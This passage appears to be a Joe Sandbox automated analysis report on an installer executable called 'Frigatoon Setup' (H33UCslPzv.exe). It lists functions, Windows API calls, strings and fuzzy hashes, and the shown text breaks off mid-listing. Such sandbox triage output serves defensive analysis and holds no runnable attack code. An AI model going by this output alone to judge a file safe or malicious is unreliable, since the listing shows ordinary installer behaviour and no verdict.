Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
Instruction ID: 242f43cfa1d4ef5d1935b54718e26804d33959e399511836c9edd6ef5d071c48
Opcode Fuzzy Hash: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
Instruction Fuzzy Hash: 5AF0A0725441009BD701EBB49A49AEEB768AF26324F6041BBE141F21C1D6B889459B6A

Function 00404A80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A97
GetDlgItem.USER32(?,00000408), ref: 00404AA4
GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404AF3
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
DeleteObject.GDI32(00000110), ref: 00404B81
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
ShowWindow.USER32(?,00000005), ref: 00404CE2
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
ImageList_Destroy.COMCTL32(?), ref: 00404EB0
GlobalFree.KERNEL32(?), ref: 00404EC0
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
InvalidateRect.USER32(?,00000000,00000001), ref: 00405011
ShowWindow.USER32(?,00000000), ref: 0040505F
GetDlgItem.USER32(?,000003FE), ref: 0040506A
ShowWindow.USER32(00000000), ref: 00405071

Strings

, xrefs: 00405049
M, xrefs: 00404C3A
N, xrefs: 00404D1B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
Opcode Fuzzy Hash: 21134a8715fb0f3faf1c9c54640a0aa9d3ab0ad6357815c91f4f9f85ad6b74aa
Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58

Function 004041E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404271
GetDlgItem.USER32(00000000,000003E8), ref: 00404285
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042A3
GetSysColor.USER32(?), ref: 004042B4
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
lstrlenA.KERNEL32(?), ref: 004042D5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
GetDlgItem.USER32(?,0000040A), ref: 0040435B
SendMessageA.USER32(00000000), ref: 0040435E
GetDlgItem.USER32(?,000003E8), ref: 00404389
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
SetCursor.USER32(00000000), ref: 004043E1
LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
SetCursor.USER32(00000000), ref: 004043FA
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404426
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A

Strings

Call, xrefs: 004043B4
N, xrefs: 00404377

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Frigatoon Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Frigatoon Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Frigatoon Setup
API String ID: 941294808-3691885874
Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4

Function 00405C5C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DED,?,?), ref: 00405C8D
GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96

Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D

GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
wsprintfA.USER32 ref: 00405CD1
GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?,?,?,?,?), ref: 00405D0C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D1B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D53
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
GlobalFree.KERNEL32(00000000), ref: 00405DBA
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DC1

Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

Strings

[Rename], xrefs: 00405D3B, 00405D4D
%s=%s, xrefs: 00405CC7

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
Opcode Fuzzy Hash: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD

Function 00406257 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
CharNextA.USER32(?,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406258
*?|<>/":, xrefs: 0040629F
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1261868204
Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D

Function 004040E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040FF
GetSysColor.USER32(00000000), ref: 0040413D
SetTextColor.GDI32(?,00000000), ref: 00404149
SetBkMode.GDI32(?,?), ref: 00404155
GetSysColor.USER32(?), ref: 00404168
SetBkColor.GDI32(?,?), ref: 00404178
DeleteObject.GDI32(?), ref: 00404192
CreateBrushIndirect.GDI32(?), ref: 0040419C

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54

Function 700224D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D

GlobalFree.KERNEL32(?), ref: 700225DE
GlobalFree.KERNEL32(00000000), ref: 70022618

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
Instruction ID: ee581b5cd2ffcd3020efd9b74a9205194d665084d8d5e0e3347cddf6e36108da
Opcode Fuzzy Hash: 666da71ae62f53e939eeb41b5ec057c328ff0c18813e23c0ea7c9ee6df6abc0a
Instruction Fuzzy Hash: F641B172104610FFE3168FA4ECD8D2E77BAFB85B22B60852DF60186221D735A9059B71

Function 004049CE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
GetMessagePos.USER32 ref: 004049F1
ScreenToClient.USER32(?,?), ref: 00404A0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43

Strings

f, xrefs: 00404A1F

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94

Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
MulDiv.KERNEL32(00310551,00000064,00310555), ref: 00402D23
wsprintfA.USER32 ref: 00402D33
SetWindowTextA.USER32(?,?), ref: 00402D43
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55

Strings

verifying installer: %d%%, xrefs: 00402D2D

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
Opcode Fuzzy Hash: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59

Function 700222F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 70022447

Part of subcall function 70021224: lstrcpynA.KERNEL32(00000000,?,700212CF,-7002404B,700211AB,-000000A0), ref: 70021234

GlobalAlloc.KERNEL32(00000040,?), ref: 700223C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700223D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 700223E8
CLSIDFromString.OLE32(00000000,00000000), ref: 700223F6
GlobalFree.KERNEL32(00000000), ref: 700223FD

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
Instruction ID: 21e80bfaa55df9d1afa5f65c0e1d50691b181eb7c5a7ef8b91627228383cdf50
Opcode Fuzzy Hash: 644c74f27a30c0de777d485295e2e042fd957a3cd262354bdf29028cf360103a
Instruction Fuzzy Hash: B9416A72504300EFE321EFB0EC84B6EB7E9FB40B32F20481AF54686152D774AA45CB61

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

